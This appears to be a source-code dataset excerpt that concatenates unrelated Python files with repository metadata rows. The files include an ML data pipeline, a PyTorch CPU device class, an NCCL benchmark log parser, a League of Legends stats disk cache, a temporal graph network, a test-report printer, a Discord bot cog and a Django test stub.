            "The `DataPipeline.seq_iter` method is deprecated! Please use DataPipeline.batch_iter()."
            "\nNOTE: The new method `DataPipeline.batch_iter` has a different return signature! "
            "\n\t Please see how to use it @ http://www.minerl.io/docs/tutorials/data_sampling.html")

    def sarsd_iter(self, num_epochs=-1, max_sequence_len=32, queue_size=None, seed=None, include_metadata=False):
        """
        Returns a generator for iterating through (state, action, reward, next_state, is_terminal)
        tuples in the dataset.

        Loads num_workers files at once as defined in minerl.data.make() and return up to
        max_sequence_len consecutive samples wrapped in a dict observation space.

        Args:
            num_epochs (int, optional): number of epochs to iterate over or -1
                to loop forever. Defaults to -1
            max_sequence_len (int, optional): maximum number of consecutive samples - may be less. Defaults to 32
            seed (int, optional): seed for random directory walk - note, specifying seed as well as a finite num_epochs
                will cause the ordering of examples to be the same after every call to seq_iter
            queue_size (int, optional): maximum number of elements to buffer at a time, each worker may hold an
                additional item while waiting to enqueue. Defaults to 16*self.number_of_workers or 2*
                self.number_of_workers if max_sequence_len == -1
            include_metadata (bool, optional): adds an additional member to the tuple containing metadata about the
                stream the data was loaded from. Defaults to False

        Yields:
            A tuple of (state, player_action, reward_from_action, next_state, is_next_state_terminal, (metadata)).
            Each element is in the format of the environment action/state/reward space and contains as many
            samples are requested.
        """
        raise DeprecationWarning(
            "The `DataPipeline.sarsd_iter` method is deprecated! Please use DataPipeline.batch_iter().")
def job(arg):
    # Module-level wrapper so the loader target can be pickled for worker
    # processes; unpacks the (file_dir, max_seq_len, data_queue) tuples built
    # in DataPipeline.batch_iter into _load_data_pyfunc's positional arguments.
    return DataPipeline._load_data_pyfunc(*arg)
| 40.554192
| 255
| 0.590742
| 18,892
| 0.95265
| 5,207
| 0.262569
| 9,807
| 0.494529
| 0
| 0
| 7,134
| 0.35974
|
3665bd678eff29512019ffaccbebf303e9c263a9
| 1,461
|
py
|
Python
|
composer/trainer/devices/device_cpu.py
|
IanWorley/composer
|
e4d443012511b387ad495b4add3b3b101d729741
|
[
"Apache-2.0"
] | null | null | null |
composer/trainer/devices/device_cpu.py
|
IanWorley/composer
|
e4d443012511b387ad495b4add3b3b101d729741
|
[
"Apache-2.0"
] | null | null | null |
composer/trainer/devices/device_cpu.py
|
IanWorley/composer
|
e4d443012511b387ad495b4add3b3b101d729741
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 MosaicML. All Rights Reserved.
"""The CPU device used for training."""
from __future__ import annotations
import logging
from contextlib import contextmanager
from typing import Any, Dict, Generator, TypeVar, Union
import torch
from composer.core import Precision
from composer.trainer.devices.device import Device, T_nnModule
# Module-level logger for this device implementation.
logger = logging.getLogger(__name__)

# Public API of this module.
__all__ = ["DeviceCPU"]

# NOTE(review): this re-declaration shadows the T_nnModule imported above from
# composer.trainer.devices.device — presumably intentional, but confirm.
T_nnModule = TypeVar("T_nnModule", bound=torch.nn.Module)
class DeviceCPU(Device):
    """An extension of :class:`~composer.trainer.devices.device.Device` for CPUs.

    This class takes no arguments.
    """
    # Distributed backend to use for CPU training.
    dist_backend = "gloo"
    # The underlying torch device all modules/tensors are moved to.
    _device = torch.device('cpu')

    def module_to_device(self, module: T_nnModule) -> T_nnModule:
        """Move *module* onto the CPU device and return it."""
        return module.to(self._device)

    def tensor_to_device(self, tensor: torch.Tensor) -> torch.Tensor:
        """Move *tensor* onto the CPU device and return it."""
        return tensor.to(self._device)

    @contextmanager
    def precision_context(self, precision: Union[str, Precision]) -> Generator[None, None, None]:
        """Precision context manager; only FP32 is supported on CPU.

        Raises:
            ValueError: if *precision* is anything other than FP32.
        """
        precision = Precision(precision)
        if precision == Precision.FP32:
            yield
        else:
            raise ValueError(f"Precision {precision} not supported for a CPU")

    def state_dict(self) -> Dict[str, Any]:
        # CPU device has no RNG state
        return {}

    def load_state_dict(self, state: Dict[str, Any]) -> None:
        """Reject any non-empty state: the CPU device is stateless.

        Raises:
            ValueError: if *state* contains any entries.
        """
        if len(state) != 0:
            raise ValueError("CPU device has no state.")
| 27.566038
| 97
| 0.687201
| 987
| 0.675565
| 285
| 0.195072
| 305
| 0.208761
| 0
| 0
| 344
| 0.235455
|
3666bf1e611ab935978f475b3bd8eb1fa7fa44ff
| 4,208
|
py
|
Python
|
experiments/generate-pdf/process_hypercluster_data.py
|
parasailteam/coconet
|
d3a7d22697686586d01ca8f55f40fd2cc8b755c1
|
[
"MIT"
] | 5
|
2022-01-12T06:36:56.000Z
|
2022-03-15T06:56:03.000Z
|
experiments/generate-pdf/process_hypercluster_data.py
|
parasailteam/coconet
|
d3a7d22697686586d01ca8f55f40fd2cc8b755c1
|
[
"MIT"
] | null | null | null |
experiments/generate-pdf/process_hypercluster_data.py
|
parasailteam/coconet
|
d3a7d22697686586d01ca8f55f40fd2cc8b755c1
|
[
"MIT"
] | 1
|
2022-03-13T05:43:50.000Z
|
2022-03-13T05:43:50.000Z
|
import os
import re
import json
import ast
import csv
import sys
import shutil
# ["allreduce-lambf16", "reducescatter-lamb-allgatherf16", "test-lambf16"] + \
# ["allreduce-adamf16", "reducescatter-adam-allgatherf16", "test-adamf16"] +\
# Every benchmark binary/command whose results may appear in the job logs;
# process_dir matches these against the recorded command line.
all_binaries = ["adam-ar-c", "adam-rs-c-ag", "adam-fuse-rs-c-ag"] + \
    ["lamb-ar-c", "lamb-rs-c-ag", "lamb-fuse-rs-c-ag"] + \
    ["python3 optimbench.py --optimizer FusedLAMB --fp16", "python3 optimbench.py --optimizer FusedLAMB", "python3 optimbench.py --optimizer FusedAdam --fp16", "python3 optimbench.py --optimizer FusedAdam"] + \
    ["multi-process-adam-scattered lamb", "multi-process-adam-scattered adam", "multi-process-adam-scatteredf16 adam", "multi-process-adam-scatteredf16 lamb"]
# GPU counts swept: 2, 4, ..., 256.
all_gpus = [2**i for i in range(1, 9)]
# NCCL channel counts swept.
all_channels = [2,16,32,64,80]
# NCCL_ALGO values.
all_algos = ["ring", "tree"]
# NCCL_PROTO values; "default" means NCCL_PROTO was left unset.
all_protocols = ["ll", "ll128", "simple", "default"]
# Message sizes: powers of two from 1 KiB to 1 GiB, plus the BERT layer size below.
all_sizes = [2**i for i in range(10, 30+1)] + [335708160]
bert_layer_size = 335708160
def slurp(file_path):
    """Return the entire contents of *file_path* as a string.

    BUG FIX: the original opened the file and closed it manually, leaking the
    handle if read() raised; a context manager closes it in all cases.
    """
    with open(file_path, "r") as f:
        return f.read()
# Helpers that pull run parameters back out of an encoded job name.
def binary_from_job_name(job_name):
    """Return the binary name encoded as 'binary=<name>-p1' inside *job_name*."""
    matches = re.findall(r'binary=(.+)-p1', job_name)
    return matches[0]
def gpu_from_job_name(job_name):
    """Return the gpu count encoded as 'gpu=<value>-' inside *job_name*."""
    matches = re.findall(r'gpu=(.+?)-', job_name)
    return matches[0]
def channels_from_job_name(job_name):
    """Return the channel count encoded as 'channels=<value>-' inside *job_name*."""
    matches = re.findall(r'channels=(.+?)-', job_name)
    return matches[0]
def algo_from_job_name(job_name):
    """Return the NCCL algorithm encoded as 'algo=<value>-' inside *job_name*."""
    matches = re.findall(r'algo=(.+?)-', job_name)
    return matches[0]
def protocol_from_job_name(job_name):
    """Return the NCCL protocol encoded as 'protocol=<value>!' inside *job_name*."""
    matches = re.findall(r'protocol=(.+?)!', job_name)
    return matches[0]
# Process stdout from each binary.
def process_stdout(stdout_txt):
    """Parse '{KEY:VAL,...}' result rows from a binary's stdout.

    Returns a dict keyed by each row's 'SZ' (message size) value, mapping to
    the full row dict with whitespace-stripped keys.
    """
    parsed = {}
    for raw in re.findall(r"{.+}", stdout_txt):
        # Quote the bare keys so the row becomes a valid Python dict literal.
        quoted = raw.replace("{", '{"').replace(":", '":').replace(",", ',"')
        record = ast.literal_eval(quoted)
        # Strip whitespace from keys, dropping the unstripped originals.
        for key in dict(record):
            record[key.strip()] = record[key]
            if key != key.strip():
                record.pop(key)
        parsed[record["SZ"]] = record
    return parsed
# Result store indexed as Binary x #GPUs x #Channels x Algorithm x Protocol,
# with an empty dict at each leaf until process_dir() fills it in.
full_data_dict = {
    binary: {
        gpu: {
            channel: {
                algo: {protocol: {} for protocol in all_protocols}
                for algo in all_algos
            }
            for channel in all_channels
        }
        for gpu in all_gpus
    }
    for binary in all_binaries
}
def process_dir(_dir):
    """Parse one job directory and record its results in full_data_dict.

    Reads the launch command from `<_dir>/json.json` to recover the sweep
    coordinates (binary, gpu count, channel count, algorithm, protocol),
    then parses `<_dir>/stdout.txt` into per-size records and stores them
    at the corresponding slot of the global full_data_dict.
    """
    # The full launch command line is stored verbatim in json.json.
    f = os.path.join(_dir, "json.json")
    command = slurp(f)
    # Identify which benchmark binary was launched (first match wins).
    binary = ""
    for b in all_binaries:
        if b in command:
            binary = b
            break
    # Recover the sweep parameters from mpirun/NCCL arguments in the command.
    gpus = int(re.findall(r"-np (\d+)", command)[0])
    channels = int(re.findall(r"NCCL_MIN_NCHANNELS=(\d+)", command)[0])
    algo = re.findall(r"NCCL_ALGO=(\w+)", command)[0].lower()
    if "NCCL_PROTO" in command:
        protocol = re.findall(r"NCCL_PROTO=([\w\d]+)", command)[0].lower()
    else:
        # Protocol was left to NCCL's default when NCCL_PROTO is absent.
        protocol = "default"
    # Sanity-check every recovered coordinate against the known sweep space.
    assert binary in all_binaries, "Possible invalid binary name '%s'"%binary
    assert gpus in all_gpus, "Possible invalid number of gpus '%s'"%gpus
    assert channels in all_channels, "Possible invalid number of channels '%s'"%channels
    assert algo in all_algos, "Possible invalid number of algo '%s'"%algo
    assert protocol in all_protocols, "Possible invalid number of protocol '%s'"%protocol
    stdout_txt = slurp(os.path.join(_dir, "stdout.txt"))
    data = process_stdout(stdout_txt)
    global full_data_dict
    # NOTE(review): prev_data is never used afterwards — presumably a
    # leftover from an overwrite/merge check; confirm before removing.
    prev_data = full_data_dict[binary][gpus][channels][algo][protocol]
    # Skip jobs that produced no parsable records (e.g. crashed runs).
    if (len(data) == 0):
        return
    full_data_dict[binary][gpus][channels][algo][protocol] = data
def get_time(d):
    """Return the elapsed-time field of a result record, checking the
    known field names in priority order: TotalTime, Total, Time.

    Raises Exception when none of the fields is present.
    """
    for field in ("TotalTime", "Total", "Time"):
        if field in d:
            return d[field]
    raise Exception("Time not found in " + str(d))
def process_results_dir(results_dir):
    """Process every job sub-directory found directly under results_dir."""
    for entry in os.listdir(results_dir):
        entry_path = os.path.join(results_dir, entry)
        if os.path.isdir(entry_path):
            process_dir(entry_path)
| 36.591304
| 210
| 0.631654
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,264
| 0.30038
|
36670d4de61ce049abde949e0e34089149ce236c
| 3,409
|
py
|
Python
|
examples/pytorch/tgn/tgn.py
|
ketyi/dgl
|
a1b859c29b63a673c148d13231a49504740e0e01
|
[
"Apache-2.0"
] | 9,516
|
2018-12-08T22:11:31.000Z
|
2022-03-31T13:04:33.000Z
|
examples/pytorch/tgn/tgn.py
|
ketyi/dgl
|
a1b859c29b63a673c148d13231a49504740e0e01
|
[
"Apache-2.0"
] | 2,494
|
2018-12-08T22:43:00.000Z
|
2022-03-31T21:16:27.000Z
|
examples/pytorch/tgn/tgn.py
|
ketyi/dgl
|
a1b859c29b63a673c148d13231a49504740e0e01
|
[
"Apache-2.0"
] | 2,529
|
2018-12-08T22:56:14.000Z
|
2022-03-31T13:07:41.000Z
|
import copy
import torch.nn as nn
import dgl
from modules import MemoryModule, MemoryOperation, MsgLinkPredictor, TemporalTransformerConv, TimeEncode
class TGN(nn.Module):
    """Temporal Graph Network for dynamic link prediction.

    Wires together a node memory (MemoryModule), a memory updater
    (MemoryOperation), a time encoder (TimeEncode), a temporal attention
    embedding layer (TemporalTransformerConv) and an MLP link predictor
    (MsgLinkPredictor).
    """

    def __init__(self,
                 edge_feat_dim,
                 memory_dim,
                 temporal_dim,
                 embedding_dim,
                 num_heads,
                 num_nodes,
                 n_neighbors=10,
                 memory_updater_type='gru',
                 layers=1):
        """
        Args:
            edge_feat_dim: dimension of raw edge features.
            memory_dim: dimension of each node's memory vector.
            temporal_dim: dimension of the time encoding.
            embedding_dim: output dimension of the embedding layer.
            num_heads: attention heads in the temporal transformer.
            num_nodes: total number of nodes (sizes the memory table).
            n_neighbors: neighbors sampled per node (default 10).
            memory_updater_type: 'gru' (default) or other updater cell type.
            layers: number of temporal transformer layers (default 1).
        """
        super(TGN, self).__init__()
        self.memory_dim = memory_dim
        self.edge_feat_dim = edge_feat_dim
        self.temporal_dim = temporal_dim
        self.embedding_dim = embedding_dim
        self.num_heads = num_heads
        self.n_neighbors = n_neighbors
        self.memory_updater_type = memory_updater_type
        self.num_nodes = num_nodes
        self.layers = layers
        # Encodes elapsed time into a temporal feature vector.
        self.temporal_encoder = TimeEncode(self.temporal_dim)
        # Per-node memory table plus the operation that refreshes it.
        self.memory = MemoryModule(self.num_nodes,
                                   self.memory_dim)
        self.memory_ops = MemoryOperation(self.memory_updater_type,
                                          self.memory,
                                          self.edge_feat_dim,
                                          self.temporal_encoder)
        # Temporal attention over sampled neighborhoods.
        self.embedding_attn = TemporalTransformerConv(self.edge_feat_dim,
                                                      self.memory_dim,
                                                      self.temporal_encoder,
                                                      self.embedding_dim,
                                                      self.num_heads,
                                                      layers=self.layers,
                                                      allow_zero_in_degree=True)
        self.msg_linkpredictor = MsgLinkPredictor(embedding_dim)

    def embed(self, postive_graph, negative_graph, blocks):
        """Embed the batch nodes and score positive/negative edge pairs.

        (Parameter name `postive_graph` is kept as-is — it is part of the
        public interface despite the typo.)
        """
        emb_graph = blocks[0]
        # Look up the current memory of the nodes involved in this batch.
        emb_memory = self.memory.memory[emb_graph.ndata[dgl.NID], :]
        emb_t = emb_graph.ndata['timestamp']
        embedding = self.embedding_attn(emb_graph, emb_memory, emb_t)
        emb2pred = dict(
            zip(emb_graph.ndata[dgl.NID].tolist(), emb_graph.nodes().tolist()))
        # The positive and negative graphs share the same id mapping.
        feat_id = [emb2pred[int(n)] for n in postive_graph.ndata[dgl.NID]]
        feat = embedding[feat_id]
        pred_pos, pred_neg = self.msg_linkpredictor(
            feat, postive_graph, negative_graph)
        return pred_pos, pred_neg

    def update_memory(self, subg):
        """Run the memory updater on subg and write back memory/timestamps."""
        new_g = self.memory_ops(subg)
        self.memory.set_memory(new_g.ndata[dgl.NID], new_g.ndata['memory'])
        self.memory.set_last_update_t(
            new_g.ndata[dgl.NID], new_g.ndata['timestamp'])

    # Some memory operation wrappers
    def detach_memory(self):
        """Detach memory from the autograd graph (stop gradient flow)."""
        self.memory.detach_memory()

    def reset_memory(self):
        """Reset all node memory to its initial state."""
        self.memory.reset_memory()

    def store_memory(self):
        """Return a deep-copied checkpoint of memory and last-update times."""
        memory_checkpoint = {}
        memory_checkpoint['memory'] = copy.deepcopy(self.memory.memory)
        memory_checkpoint['last_t'] = copy.deepcopy(self.memory.last_update_t)
        return memory_checkpoint

    def restore_memory(self, memory_checkpoint):
        """Restore memory state from a checkpoint made by store_memory()."""
        self.memory.memory = memory_checkpoint['memory']
        # BUGFIX: write back to `last_update_t` — the attribute that
        # store_memory() reads and set_last_update_t() maintains.  The old
        # code assigned a new `last_update_time` attribute, so the saved
        # timestamps were never actually restored.
        self.memory.last_update_t = memory_checkpoint['last_t']
| 40.105882
| 104
| 0.573482
| 3,256
| 0.955119
| 0
| 0
| 0
| 0
| 0
| 0
| 159
| 0.046641
|
366765dfc3b501d93189b1860864e2cb97e5eb00
| 3,813
|
py
|
Python
|
pyinq/printers/__init__.py
|
Auzzy/pyinq
|
91cc13013931620458ae6b23abc1d4a3e5ded27f
|
[
"0BSD"
] | null | null | null |
pyinq/printers/__init__.py
|
Auzzy/pyinq
|
91cc13013931620458ae6b23abc1d4a3e5ded27f
|
[
"0BSD"
] | null | null | null |
pyinq/printers/__init__.py
|
Auzzy/pyinq
|
91cc13013931620458ae6b23abc1d4a3e5ded27f
|
[
"0BSD"
] | null | null | null |
"""
Copyright (c) 2012-2013, Austin Noto-Moniz (metalnut4@netscape.net)
Permission to use, copy, modify, and/or distribute this software for any purpose
with or without fee is hereby granted, provided that the above copyright notice
and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
THIS SOFTWARE.
"""
class AbstractPrinter(object):
    """
    Abstract base class for printers that report the results of the
    executed tests.  Subclasses must override the logging hooks below;
    calling any unimplemented hook raises NotImplementedError.
    """
    mess = "The \"{func}\" method is not implemented for the type {type}"

    def __init__(self, **kwargs):
        # Direct instantiation of the abstract base is forbidden.
        if type(self) is AbstractPrinter:
            raise TypeError("Can't instantiate the abstract base class AbstractPrinter")

    def _unimplemented(self, func):
        # Raise the standard "not implemented" error, naming the hook and
        # the concrete subclass type.
        raise NotImplementedError(
            AbstractPrinter.mess.format(func=func, type=self.__class__.__name__))

    def title(self, name):
        """Logs the report title."""
        self._unimplemented("title")

    def section(self, label, name, nl=True):
        """Logs a section header."""
        self._unimplemented("section")

    def log_test(self, label, result):
        """
        Logs the results of a single test (TestResult object),
        labeled with the provided label.
        """
        self._unimplemented("log_test")

    def log_fixture(self, label, result):
        """
        Logs the results of a single fixture (TestResult object),
        labeled with the provided label.
        """
        self._unimplemented("log_fixture")

    def cleanup(self):
        """Perform required cleanup operations, such as writing to a file."""
import pyinq.printers.cli
import pyinq.printers.html
def get_default():
    """Return the default printer module (the command-line printer)."""
    return pyinq.printers.cli
def print_report(suite, printer_mod=None, **kwargs):
    """Render a full test report for *suite* using a printer module.

    Walks Suite -> Module -> Class -> Test, logging before/after fixtures
    at every level.  printer_mod defaults to the CLI printer; kwargs are
    forwarded to its Printer constructor.  cleanup() always runs, even if
    printing fails part-way.
    """
    def log_fixture(label, fixture):
        # Only log a fixture when it actually ran (non-empty result list).
        if fixture:
            printer.log_fixture(label,fixture)
    printer_mod = printer_mod if printer_mod else get_default()
    printer = printer_mod.Printer(**kwargs)
    try:
        printer.title("Test Report")
        log_fixture("Before Suite",suite.before)
        for module in suite:
            printer.section("Module",module.name,nl=False)
            log_fixture("Before Module",module.before)
            for cls in sorted(module, key=lambda cls: cls.name):
                printer.section("Class",cls.name)
                log_fixture("Before Class",cls.before)
                for test in sorted(cls, key=lambda test: test.name):
                    before_label = "Before \"{0}\"".format(test.name)
                    log_fixture(before_label,test.before)
                    # Skip the test body if its last before-fixture failed.
                    if not test.before or test.before[-1].result:
                        printer.log_test("Test",test)
                    after_label = "After \"{0}\"".format(test.name)
                    log_fixture(after_label,test.after)
                log_fixture("After Class",cls.after)
            log_fixture("After Module",module.after)
        log_fixture("After Suite",suite.after)
    finally:
        # Always flush/close the printer (e.g. write the HTML file).
        printer.cleanup()
| 35.635514
| 88
| 0.647522
| 1,570
| 0.411749
| 0
| 0
| 0
| 0
| 0
| 0
| 1,554
| 0.407553
|
3667faea99d9e44cf1ec814efbac09de88c252f2
| 2,255
|
py
|
Python
|
cassiopeia-diskstore/cassiopeia_diskstore/championgg.py
|
mrtolkien/cassiopeia-datastores
|
1fbc6f9163ec4a5b4efdc892c219b5785f62b274
|
[
"MIT"
] | 3
|
2017-11-22T20:38:18.000Z
|
2018-09-04T07:48:55.000Z
|
cassiopeia-diskstore/cassiopeia_diskstore/championgg.py
|
mrtolkien/cassiopeia-datastores
|
1fbc6f9163ec4a5b4efdc892c219b5785f62b274
|
[
"MIT"
] | 12
|
2018-06-05T16:08:36.000Z
|
2020-11-26T19:16:59.000Z
|
cassiopeia-diskstore/cassiopeia_diskstore/championgg.py
|
mrtolkien/cassiopeia-datastores
|
1fbc6f9163ec4a5b4efdc892c219b5785f62b274
|
[
"MIT"
] | 10
|
2017-11-14T18:59:10.000Z
|
2020-09-17T15:18:29.000Z
|
from typing import Type, TypeVar, MutableMapping, Any, Iterable
from datapipelines import DataSource, DataSink, PipelineContext, Query, validate_query
from cassiopeia_championgg.dto import ChampionGGStatsListDto, ChampionGGStatsDto
from cassiopeia.datastores.uniquekeys import convert_region_to_platform
from .common import SimpleKVDiskService
T = TypeVar("T")  # generic payload type used by the dispatch methods below
class ChampionGGDiskService(SimpleKVDiskService):
    """Disk-backed datapipelines source/sink for champion.gg statistics.

    The generic get/get_many/put/put_many methods are dispatch stubs; the
    concrete handlers for ChampionGGStatsListDto are registered on them
    via @get.register / @put.register below.
    """
    @DataSource.dispatch
    def get(self, type: Type[T], query: MutableMapping[str, Any], context: PipelineContext = None) -> T:
        pass
    @DataSource.dispatch
    def get_many(self, type: Type[T], query: MutableMapping[str, Any], context: PipelineContext = None) -> Iterable[T]:
        pass
    @DataSink.dispatch
    def put(self, type: Type[T], item: T, context: PipelineContext = None) -> None:
        pass
    @DataSink.dispatch
    def put_many(self, type: Type[T], items: Iterable[T], context: PipelineContext = None) -> None:
        pass
    # Query contract: "patch" is required; "elo" defaults to the combined
    # PLATINUM_DIAMOND_MASTER_CHALLENGER bracket.
    _validate_get_gg_champion_list_query = Query. \
        has("patch").as_(str).also. \
        can_have("elo").with_default(lambda *args, **kwargs: "PLATINUM_DIAMOND_MASTER_CHALLENGER", supplies_type=str)
    @get.register(ChampionGGStatsListDto)
    @validate_query(_validate_get_gg_champion_list_query, convert_region_to_platform)
    def get_champion_list(self, query: MutableMapping[str, Any], context: PipelineContext = None) -> ChampionGGStatsListDto:
        """Load the champion stats list stored under <Dto>.<patch>.<elo>."""
        patch = query["patch"]
        elo = query["elo"]
        key = "{clsname}.{patch}.{elo}".format(clsname=ChampionGGStatsListDto.__name__,
                                               patch=patch,
                                               elo=elo)
        data = self._get(key)
        # Re-wrap each stored champion entry in its Dto type.
        data["data"] = [ChampionGGStatsDto(champion) for champion in data["data"]]
        return ChampionGGStatsListDto(data)
    @put.register(ChampionGGStatsListDto)
    def put_champion_list(self, item: ChampionGGStatsListDto, context: PipelineContext = None) -> None:
        """Store a champion stats list under the same <Dto>.<patch>.<elo> key."""
        key = "{clsname}.{patch}.{elo}".format(clsname=ChampionGGStatsListDto.__name__,
                                               patch=item["patch"],
                                               elo=item["elo"])
        self._put(key, item)
| 43.365385
| 124
| 0.66031
| 1,888
| 0.837251
| 0
| 0
| 1,594
| 0.706874
| 0
| 0
| 137
| 0.060754
|
366887a1056798b43b8bf1750a891210075a1524
| 5,788
|
py
|
Python
|
src/cogs/fun-commands.py
|
ShubhamPatilsd/johnpeter-discord
|
40738f8df57f85275eb4887ab2ed9a9b96ba9e40
|
[
"MIT"
] | 1
|
2021-07-08T09:03:08.000Z
|
2021-07-08T09:03:08.000Z
|
src/cogs/fun-commands.py
|
vidhyanijadala/johnpeter-discord
|
40738f8df57f85275eb4887ab2ed9a9b96ba9e40
|
[
"MIT"
] | null | null | null |
src/cogs/fun-commands.py
|
vidhyanijadala/johnpeter-discord
|
40738f8df57f85275eb4887ab2ed9a9b96ba9e40
|
[
"MIT"
] | 1
|
2021-07-08T09:03:04.000Z
|
2021-07-08T09:03:04.000Z
|
import asyncio
import json
import os
import random
import re
import urllib
import urllib.request
from glob import glob
from os import getenv
from random import choice
import discord
from discord.ext import commands
from utils.cms import get_sponsor_intro, get_sponsor_audio
from utils.commands import only_random, require_vc, OnlyAllowedInChannels
class FunCommands(commands.Cog, name="Fun"):
    """Discord cog with joke/animal-picture commands and sponsor audio playback.

    Most commands are restricted to the "random" channel via @only_random.
    """
    def __init__(self, bot):
        self.bot: commands.Bot = bot
        # Channel ids, overridable via environment variables.
        self.random_channel = int(getenv("CHANNEL_RANDOM", 689534362760642676))
        self.mod_log = int(getenv("CHANNEL_MOD_LOG", 689216590297694211))
        # Download sponsor mp3 files into the local cache directory.
        urls = get_sponsor_audio()
        if not os.path.isdir("./cache/sponsorships/"):
            os.makedirs("./cache/sponsorships/")
        for url in urls:
            # Strips everything up to the last '/' of the URL to get a file name.
            file_name = re.sub("(h.*\/)+", "", url)
            urllib.request.urlretrieve(url, f"./cache/sponsorships/{file_name}")
        file_name = re.sub("(h.*\/)+", "", get_sponsor_intro())
        # NOTE(review): sponsorship() below plays "./cache/sponsor-intro.mp3";
        # this assumes the intro URL's basename is exactly that — confirm.
        urllib.request.urlretrieve(get_sponsor_intro(), f"./cache/{file_name}")
        self.sponsorships = []
        for file in glob("./cache/sponsorships/*.mp3"):
            print(file)
            self.sponsorships.append(file)
    @commands.Cog.listener()
    async def on_message(self, message):
        """Handle chained "catn't"/"dogn'tn't..." messages: each n't flips cat<->dog."""
        msg = message.content
        manyAnimalsRegex = re.compile(f"{await self.bot.get_prefix(message)}(cat|dog)((?:n't)+)")
        match = manyAnimalsRegex.match(msg)
        if match:
            if message.channel.id != int(getenv("CHANNEL_RANDOM", 689534362760642676)): # hacky @only_random replacement
                await message.channel.send(f"You can only do that in <#{getenv('CHANNEL_RANDOM', 689534362760642676)}>")
                return
            animal,nts = match.group(1,2)
            animal_commands = ["cat","dog"]
            # An odd number of n't suffixes switches to the other animal.
            command_to_call = animal_commands[(animal_commands.index(animal) + nts.count("n't"))%2]
            await self.bot.get_command(command_to_call)(message.channel)
    @commands.command(name="cat",aliases=["kitten", "kitty", "catto"])
    @only_random
    async def cat(self, ctx):
        """Send a random cat picture."""
        with urllib.request.urlopen("https://aws.random.cat/meow") as url:
            data = json.loads(url.read().decode())
            await ctx.send(data.get('file'))
    @commands.command(name="doggo",aliases=["dog", "puppy", "pupper"])
    @only_random
    async def doggo(self,ctx):
        """Send a random dog picture."""
        with urllib.request.urlopen("https://dog.ceo/api/breeds/image/random") as url:
            data = json.loads(url.read().decode())
            await ctx.send(data.get('message'))
    @commands.command(name="floof", aliases=["floofer","floofo"])
    @only_random
    async def floof(self, ctx):
        """Send a random cat OR dog picture."""
        await ctx.invoke(self.bot.get_command(random.choice(['doggo', 'cat'])))
    @commands.command(name="bird", aliases=["birb","birdy","birdie"])
    @only_random
    async def bird(self, ctx):
        """Send a random bird picture."""
        with urllib.request.urlopen("https://some-random-api.ml/img/birb") as url:
            data = json.loads(url.read().decode())
            await ctx.send(data.get('link'))
    @commands.command(name ="fish", aliases=["cod", "codday", "phish"])
    @only_random
    async def fish(self, ctx):
        """Send one of a fixed set of fish pictures."""
        fish = ["https://tinyurl.com/s8zadryh", "https://tinyurl.com/v2xsewah", "https://tinyurl.com/hnmdr2we", "https://tinyurl.com/ypbcsa3u"]
        await ctx.send(random.choice(fish))
    @commands.command(name="triggered", aliases=["mad","angry"])
    @only_random
    async def triggered(self, ctx, arg):
        """Send a "triggered" overlay for the given avatar URL."""
        # NOTE(review): `arg` is a required parameter, so the else branch can
        # only fire when arg is falsy (e.g. empty string), not when omitted —
        # a missing argument raises before this body runs; confirm intent.
        if arg:
            await ctx.send("https://some-random-api.ml/canvas/triggered?avatar={}".format(arg))
        else:
            await ctx.send("<:revoltLola:829824598178529311> Hey you didn't tell me an image URL!")
    @commands.command(name="owo")
    @only_random
    async def owo(self, ctx):
        """owo"""
        await ctx.send(f"owo what's {ctx.author.mention}?")
    @commands.command(name="uwu")
    @only_random
    async def uwu(self, ctx):
        """uwu"""
        await ctx.send(f"uwu what's {ctx.author.mention}?")
    @commands.command(
        name="up-down-up-down-left-right-left-right-b-a-start",
        hidden=True,
        aliases=["updownupdownleftrightleftrightbastart"],
    )
    @only_random
    async def updownupdownleftrightleftrightbastart(
        self, ctx,
    ):
        """A lot of typing for nothing."""
        await ctx.send("wow that's a long cheat code. You win 20 CodeCoin!!")
    @commands.command(pass_context=True, aliases=["disconnect"])
    async def disconnectvc(self, ctx):
        """Disconnect the bot from its current voice channel, if any."""
        await ctx.message.delete()
        vc = ctx.message.guild.voice_client
        if vc is None:
            await ctx.send("You silly, I'm not in any VCs right now.")
        else:
            await vc.disconnect()
    @commands.command(
        name="sponsorship",
        aliases=[
            "sponsor",
            "sponsormessage",
            "sponsor-message",
            "sponsor_message",
            "sponsors",
        ],
    )
    @require_vc
    async def sponsorship(self, ctx):
        """Says a message from a sponsor."""
        # NOTE(review): retval is never used — presumably leftover debugging.
        retval = os.getcwd()
        vc = await ctx.message.author.voice.channel.connect()
        try:
            file = choice(self.sponsorships)
            intro = discord.FFmpegPCMAudio(f"./cache/sponsor-intro.mp3")
            sponsor = discord.FFmpegPCMAudio(f"{file}")
            # Play the intro, then a random sponsor clip, polling until done.
            player = vc.play(intro)
            while vc.is_playing():
                await asyncio.sleep(1)
            player = vc.play(sponsor)
            while vc.is_playing():
                await asyncio.sleep(1)
        finally:
            await vc.disconnect()
def setup(bot):
    """discord.py extension entry point: register the FunCommands cog."""
    bot.add_cog(FunCommands(bot))
| 35.292683
| 143
| 0.609537
| 5,383
| 0.930028
| 0
| 0
| 4,154
| 0.717692
| 3,010
| 0.520041
| 1,433
| 0.247581
|
3669ffcdb82515f7959090d8ec3b463fb0d9a6f3
| 1,175
|
py
|
Python
|
aluraflix/tests/test_serializer.py
|
bonetou/django-rest-tests-documentation
|
a9e640e6425da560215d8f985a428d8eb90e09f9
|
[
"MIT"
] | null | null | null |
aluraflix/tests/test_serializer.py
|
bonetou/django-rest-tests-documentation
|
a9e640e6425da560215d8f985a428d8eb90e09f9
|
[
"MIT"
] | null | null | null |
aluraflix/tests/test_serializer.py
|
bonetou/django-rest-tests-documentation
|
a9e640e6425da560215d8f985a428d8eb90e09f9
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from aluraflix.models import Programa
